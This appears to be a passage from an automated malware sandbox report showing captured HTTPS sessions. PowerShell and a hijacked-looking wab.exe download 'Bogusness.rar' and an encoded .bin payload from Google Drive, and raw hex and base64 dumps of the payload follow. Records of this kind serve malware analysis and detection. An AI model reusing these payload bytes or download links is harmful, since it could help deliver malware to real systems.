                                                                                  Content-Security-Policy: script-src 'nonce-bivVz2uxgaXJbfey8g8Paw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649716142.251.35.161443416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-23 05:53:28 UTC233OUTGET /download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-04-23 05:53:29 UTC4745INHTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: ABPtcPrJVU27lubB1I2WgNvatQpnA4ojeob_Zx2f4vWKhWs0QkaDJmRCUeI_a-ZnT8pS9v8VKfY
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="Bogusness.rar"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 429220
                                                                                  Last-Modified: Mon, 22 Apr 2024 07:07:41 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:53:29 GMT
                                                                                  Expires: Tue, 23 Apr 2024 05:53:29 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=VycTRQ==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  2024-04-23 05:53:29 UTC4745INData Raw: 36 77 4c 64 43 58 45 42 6d 37 73 4b 41 67 77 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 4f 73 43 35 36 42 78 41 5a 75 35 5a 30 71 2b 78 4f 73 43 55 46 4c 72 41 6a 43 78 67 66 48 74 4d 78 37 30 63 51 47 62 63 51 47 62 67 66 47 4b 65 61 41 77 36 77 4a 45 62 6e 45 42 6d 33 45 42 6d 33 45 42 6d 37 70 6c 7a 4f 2b 46 63 51 47 62 63 51 47 62 36 77 4a 7a 63 58 45 42 6d 7a 48 4b 36 77 49 49 49 48 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 7a 62 4c 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 74 6b 42 66 41 6e 7a 4e 36 77 4c 76 79 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 61 32 61 42 77 2f 52 32 50 51 48 72 41 76 59 4d 36 77 49 68 56 62 72 5a 58 66 51 77 36 77 4c 56 6c 65 73 43 69 79 71 42 38 69 52
                                                                                  Data Ascii: 6wLdCXEBm7sKAgwAcQGbcQGbA1wkBOsC56BxAZu5Z0q+xOsCUFLrAjCxgfHtMx70cQGbcQGbgfGKeaAw6wJEbnEBm3EBm3EBm7plzO+FcQGbcQGb6wJzcXEBmzHK6wIIIHEBm4kUC3EBm+sCzbLR4nEBm3EBm4PBBHEBm3EBm4H5tkBfAnzN6wLvy3EBm4tEJARxAZtxAZuJw3EBm+sCa2aBw/R2PQHrAvYM6wIhVbrZXfQw6wLVlesCiyqB8iR
                                                                                  2024-04-23 05:53:29 UTC4745INData Raw: 5a 30 32 65 31 61 2f 67 35 46 64 4c 61 38 56 4d 57 54 77 32 58 4e 4b 59 55 6e 48 32 54 4e 70 6a 72 65 34 4e 67 76 72 32 70 36 70 76 36 7a 4a 49 36 74 79 47 30 38 30 68 4f 6b 65 45 38 73 70 53 67 70 57 65 33 66 49 76 48 4a 4c 42 75 67 55 43 56 45 55 64 47 56 49 54 75 39 63 6d 49 38 4b 39 4f 39 63 38 49 57 68 6b 44 59 6d 31 49 4c 76 4b 4f 6a 41 66 73 54 67 66 77 4c 43 38 51 6b 6f 72 79 41 55 72 72 54 50 30 6c 74 76 74 33 37 73 64 42 61 49 56 37 51 43 62 6b 6a 49 6e 57 63 45 49 6b 6f 35 4d 62 4b 50 76 64 79 70 41 45 65 63 62 73 56 6b 35 5a 55 4e 6c 2b 39 58 69 4e 31 63 4f 6f 77 51 50 52 52 2f 59 5a 2b 51 39 70 70 39 63 57 36 77 36 32 5a 62 54 71 65 41 6f 2f 49 36 74 41 4a 75 42 41 32 43 2f 4b 44 31 54 4e 2f 4d 5a 34 77 72 77 71 38 50 79 77 70 62 34 41 4c 62
                                                                                  Data Ascii: Z02e1a/g5FdLa8VMWTw2XNKYUnH2TNpjre4Ngvr2p6pv6zJI6tyG080hOkeE8spSgpWe3fIvHJLBugUCVEUdGVITu9cmI8K9O9c8IWhkDYm1ILvKOjAfsTgfwLC8QkoryAUrrTP0ltvt37sdBaIV7QCbkjInWcEIko5MbKPvdypAEecbsVk5ZUNl+9XiN1cOowQPRR/YZ+Q9pp9cW6w62ZbTqeAo/I6tAJuBA2C/KD1TN/MZ4wrwq8Pywpb4ALb
                                                                                  2024-04-23 05:53:29 UTC463INData Raw: 4a 33 7a 49 65 34 4e 4b 52 7a 30 6e 77 58 45 6e 34 44 44 4d 76 38 45 57 48 57 44 76 64 6e 38 32 71 70 71 4d 35 4a 33 41 41 72 42 49 4b 33 69 34 46 62 45 45 4a 4a 39 50 4f 72 4e 54 71 33 69 39 50 76 50 31 46 42 44 46 57 6f 6a 44 44 4b 7a 53 70 7a 69 39 55 4a 4f 74 2f 62 50 4e 52 2b 31 4f 32 52 75 38 67 2f 76 45 56 2b 41 61 4f 4f 42 4f 78 39 67 70 53 41 77 4c 33 4e 38 42 4e 46 45 35 6a 35 38 69 45 2b 64 41 50 47 72 4c 67 73 76 75 33 6f 7a 70 35 43 6d 4a 51 79 6d 52 46 77 48 58 66 52 30 42 61 53 74 50 47 4d 49 6c 79 5a 79 79 65 66 35 6f 7a 42 59 36 72 44 4c 6a 51 49 31 2f 44 6b 53 45 64 67 63 30 77 44 47 4c 51 37 79 62 32 62 6a 51 67 34 64 62 4f 62 47 71 33 4c 6c 4b 74 32 58 66 6e 39 46 6c 42 76 77 68 42 6e 5a 72 44 76 67 2f 74 5a 44 6a 39 56 42 34 58 62 34
                                                                                  Data Ascii: J3zIe4NKRz0nwXEn4DDMv8EWHWDvdn82qpqM5J3AArBIK3i4FbEEJJ9POrNTq3i9PvP1FBDFWojDDKzSpzi9UJOt/bPNR+1O2Ru8g/vEV+AaOOBOx9gpSAwL3N8BNFE5j58iE+dAPGrLgsvu3ozp5CmJQymRFwHXfR0BaStPGMIlyZyyef5ozBY6rDLjQI1/DkSEdgc0wDGLQ7yb2bjQg4dbObGq3LlKt2Xfn9FlBvwhBnZrDvg/tZDj9VB4Xb4
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 50 5a 44 74 37 76 38 31 78 34 58 53 63 53 73 6f 4a 55 4e 74 34 73 41 6c 78 6e 4a 51 54 51 7a 4a 70 6c 62 67 53 6c 45 4e 4b 51 75 5a 30 6a 66 76 41 4d 70 68 72 56 54 45 64 52 36 2f 6d 44 56 54 78 48 2f 76 43 58 62 59 57 51 34 46 68 68 4b 53 4c 48 74 36 68 4f 61 6a 32 38 72 43 64 71 33 75 41 37 51 54 63 42 4a 33 36 6e 4a 63 6c 42 6c 31 6b 48 57 4e 31 6c 56 44 65 34 34 7a 6b 74 44 49 4f 6a 72 36 53 65 65 31 73 74 6c 53 2b 51 7a 44 4e 51 53 44 34 4b 54 74 63 67 4f 6b 72 35 7a 44 70 2b 4b 44 33 33 30 4d 72 65 39 42 6d 33 67 52 30 6e 43 65 70 6f 51 49 72 65 39 47 38 69 35 43 55 6e 43 58 67 6c 31 61 32 66 57 51 64 51 2f 63 31 55 4d 7a 7a 66 4c 49 68 4f 54 47 48 75 6c 6b 43 55 73 50 76 41 66 37 38 63 65 6d 34 42 67 69 33 55 62 49 69 78 4a 7a 68 6b 4e 6b 62 48 41
                                                                                  Data Ascii: PZDt7v81x4XScSsoJUNt4sAlxnJQTQzJplbgSlENKQuZ0jfvAMphrVTEdR6/mDVTxH/vCXbYWQ4FhhKSLHt6hOaj28rCdq3uA7QTcBJ36nJclBl1kHWN1lVDe44zktDIOjr6See1stlS+QzDNQSD4KTtcgOkr5zDp+KD330Mre9Bm3gR0nCepoQIre9G8i5CUnCXgl1a2fWQdQ/c1UMzzfLIhOTGHulkCUsPvAf78cem4Bgi3UbIixJzhkNkbHA
                                                                                  2024-04-23 05:53:29 UTC68INData Raw: 64 71 49 39 79 57 45 49 32 6a 37 79 4b 68 41 6a 4a 71 6c 47 43 59 57 61 4a 31 69 56 77 32 39 56 4e 36 63 65 64 47 56 4c 2b 6e 64 75 58 70 56 49 2f 4c 64 46 79 43 45 53 53 73 67 31 4e 6b 72 49 4e 54 5a 4b
                                                                                  Data Ascii: dqI9yWEI2j7yKhAjJqlGCYWaJ1iVw29VN6cedGVL+nduXpVI/LdFyCESSsg1NkrINTZK
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 79 4e 64 72 6d 6e 6d 4f 50 57 7a 6b 45 5a 46 71 2f 31 4e 42 79 76 69 35 4f 38 76 38 45 52 79 32 4a 41 73 35 53 77 47 41 4e 6b 72 49 4e 54 5a 4b 79 44 55 32 53 6a 33 72 52 67 71 61 6f 55 68 6c 63 61 4d 38 7a 6c 59 4e 74 35 4d 62 71 4e 6e 51 61 50 54 57 5a 51 6a 66 6d 39 64 51 76 71 74 4d 54 35 6b 72 76 75 41 62 74 65 35 2f 74 41 4a 75 70 54 6d 63 64 4a 71 50 45 4c 41 33 6d 72 65 34 48 57 35 4a 6e 55 6e 33 4f 78 57 33 73 6d 48 57 51 64 49 33 58 56 55 4e 39 7a 50 4d 30 64 47 6c 46 79 56 72 51 44 45 75 7a 46 70 63 32 69 4b 65 4a 44 4a 71 5a 43 46 38 4c 65 63 64 61 32 52 6d 39 39 42 55 6b 39 45 74 39 4f 56 62 38 6d 54 49 2b 48 6a 33 50 55 7a 44 61 63 34 53 62 37 64 4f 37 46 32 35 4f 72 5a 64 42 47 53 6a 4b 6d 48 31 2b 32 34 45 62 45 6e 43 4f 6f 79 53 6a 62 65
                                                                                  Data Ascii: yNdrmnmOPWzkEZFq/1NByvi5O8v8ERy2JAs5SwGANkrINTZKyDU2Sj3rRgqaoUhlcaM8zlYNt5MbqNnQaPTWZQjfm9dQvqtMT5krvuAbte5/tAJupTmcdJqPELA3mre4HW5JnUn3OxW3smHWQdI3XVUN9zPM0dGlFyVrQDEuzFpc2iKeJDJqZCF8Lecda2Rm99BUk9Et9OVb8mTI+Hj3PUzDac4Sb7dO7F25OrZdBGSjKmH1+24EbEnCOoySjbe
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 78 41 65 70 5a 2b 56 4c 4b 57 56 4a 6d 44 2b 70 51 6b 52 72 63 78 4b 43 69 56 53 2f 56 4b 55 6f 79 47 35 32 78 6f 53 4b 54 78 73 6e 53 4d 58 4b 73 42 39 56 39 37 4e 4c 6e 4b 4a 30 51 79 2b 51 52 37 5a 36 61 72 47 66 7a 49 6f 42 61 6c 6b 6e 45 52 79 7a 51 78 4c 65 37 76 63 47 58 6e 30 6e 45 56 64 32 47 33 37 65 6a 6a 30 32 74 57 45 45 4d 51 36 4b 56 49 44 6c 57 54 76 41 74 41 74 7a 6e 30 54 46 62 6c 79 6b 57 76 30 6c 32 5a 66 62 52 33 30 4b 74 70 35 56 38 2b 73 4b 65 72 31 39 73 33 71 6a 76 4d 54 59 61 63 49 4b 54 68 7a 6b 41 50 55 65 66 74 77 50 6f 61 63 6d 5a 66 7a 6e 53 6e 49 4c 39 32 74 6d 47 33 47 65 71 77 79 6f 30 4e 4e 66 78 39 55 6c 52 41 42 76 49 52 2b 31 52 48 46 39 6f 63 36 59 35 4a 55 4c 6c 2f 44 52 52 4e 4c 76 62 41 48 4e 79 37 6a 64 77 78 70
                                                                                  Data Ascii: xAepZ+VLKWVJmD+pQkRrcxKCiVS/VKUoyG52xoSKTxsnSMXKsB9V97NLnKJ0Qy+QR7Z6arGfzIoBalknERyzQxLe7vcGXn0nEVd2G37ejj02tWEEMQ6KVIDlWTvAtAtzn0TFblykWv0l2ZfbR30Ktp5V8+sKer19s3qjvMTYacIKThzkAPUeftwPoacmZfznSnIL92tmG3Geqwyo0NNfx9UlRABvIR+1RHF9oc6Y5JULl/DRRNLvbAHNy7jdwxp
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 4f 6c 53 74 6f 36 63 4f 74 68 44 6e 6c 33 4b 52 38 32 4a 59 53 37 64 50 2f 4c 6d 53 74 79 76 34 6a 30 75 33 50 4b 79 63 4c 75 6a 5a 68 59 57 39 32 6a 6a 44 51 32 53 67 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b
                                                                                  Data Ascii: OlSto6cOthDnl3KR82JYS7dP/LmStyv4j0u3PKycLujZhYW92jjDQ2SgAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAK
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 4d 41 31 76 52 2f 73 33 66 34 41 7a 44 56 6d 38 68 66 73 59 72 33 39 58 6b 37 4c 76 41 41 73 53 71 6e 51 4d 78 69 58 66 71 38 64 56 4c 7a 52 53 38 2b 6f 73 6f 4b 33 4f 30 6e 4e 30 41 79 61 75 33 79 68 56 46 6c 74 77 4e 74 4a 75 77 38 35 6d 2b 57 53 7a 70 63 37 47 47 65 6c 6a 44 4a 69 67 65 73 78 78 31 50 57 71 46 4c 79 32 52 41 77 30 76 53 77 66 4d 75 31 53 53 33 4d 79 44 55 35 78 66 5a 62 4e 6b 71 58 73 50 30 53 51 57 55 79 68 72 39 46 55 57 71 39 68 73 54 46 4a 53 50 2f 47 52 76 57 50 31 45 70 66 4f 52 41 45 4b 57 59 53 32 52 38 6e 38 38 4d 54 53 6d 38 51 33 67 71 47 6e 42 45 6a 79 41 56 4d 49 55 6e 31 32 55 62 4a 68 61 38 47 38 50 51 34 54 50 37 57 76 67 4d 41 79 52 55 6c 51 70 33 33 36 53 39 47 74 77 55 2b 61 57 69 42 33 74 75 71 71 53 63 74 6a 2f 5a
                                                                                  Data Ascii: MA1vR/s3f4AzDVm8hfsYr39Xk7LvAAsSqnQMxiXfq8dVLzRS8+osoK3O0nN0Ayau3yhVFltwNtJuw85m+WSzpc7GGeljDJigesxx1PWqFLy2RAw0vSwfMu1SS3MyDU5xfZbNkqXsP0SQWUyhr9FUWq9hsTFJSP/GRvWP1EpfORAEKWYS2R8n88MTSm8Q3gqGnBEjyAVMIUn12UbJha8G8PQ4TP7WvgMAyRUlQp336S9GtwU+aWiB3tuqqSctj/Z
                                                                                  2024-04-23 05:53:29 UTC1255INData Raw: 79 5a 51 35 51 6b 4e 45 31 55 4e 32 73 42 49 6b 58 4b 68 39 30 68 46 37 42 58 47 32 74 73 36 2f 42 42 34 70 35 67 41 7a 32 48 61 69 45 69 42 49 50 46 4e 70 31 61 45 61 4c 35 6c 69 69 5a 6d 55 6c 76 48 4c 4a 34 79 38 57 75 75 30 77 54 33 6b 70 35 4c 44 33 7a 66 73 38 64 5a 71 79 4d 31 64 76 74 53 78 52 65 59 61 70 70 65 2b 75 79 58 4b 4e 54 59 5a 63 36 41 4c 33 48 79 30 33 57 4b 41 72 2b 44 4c 4f 39 32 31 31 50 57 30 33 53 37 76 55 4e 62 44 30 34 50 6a 45 6e 68 64 70 46 56 6b 4a 66 54 58 2b 74 61 52 4b 33 65 6b 74 51 70 2f 77 76 4e 39 37 73 41 59 6d 44 65 76 65 42 6d 54 33 62 6f 4a 7a 44 56 67 39 43 36 48 75 64 39 4a 32 2b 50 30 6c 34 53 33 76 47 66 37 53 65 78 4a 77 35 33 41 6d 48 65 2f 64 49 6f 62 64 78 46 35 30 64 37 66 4a 77 6e 76 77 53 76 67 2f 55 6a
                                                                                  Data Ascii: yZQ5QkNE1UN2sBIkXKh90hF7BXG2ts6/BB4p5gAz2HaiEiBIPFNp1aEaL5liiZmUlvHLJ4y8Wuu0wT3kp5LD3zfs8dZqyM1dvtSxReYappe+uyXKNTYZc6AL3Hy03WKAr+DLO9211PW03S7vUNbD04PjEnhdpFVkJfTX+taRK3ektQp/wvN97sAYmDeveBmT3boJzDVg9C6Hud9J2+P0l4S3vGf7SexJw53AmHe/dIobdxF50d7fJwnvwSvg/Uj


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649723142.250.65.1744435808C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-23 05:54:01 UTC216OUTGET /uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  2024-04-23 05:54:01 UTC1582INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Tue, 23 Apr 2024 05:54:01 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-pLo-SQ53MpStYPtq1FYxAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649724142.251.35.1614435808C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-23 05:54:01 UTC258OUTGET /download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-04-23 05:54:02 UTC4764INHTTP/1.1 200 OK
                                                                                  X-GUploader-UploadID: ABPtcPrBIZBX_skfQSCXDToD_n_xm8SmNUIsH5mAZWSNpQKFg55otl-zCgdrCUgLTJuG7juVeL4
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="DlDFxwFOqSzRncinOotjHdfVW167.bin"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, 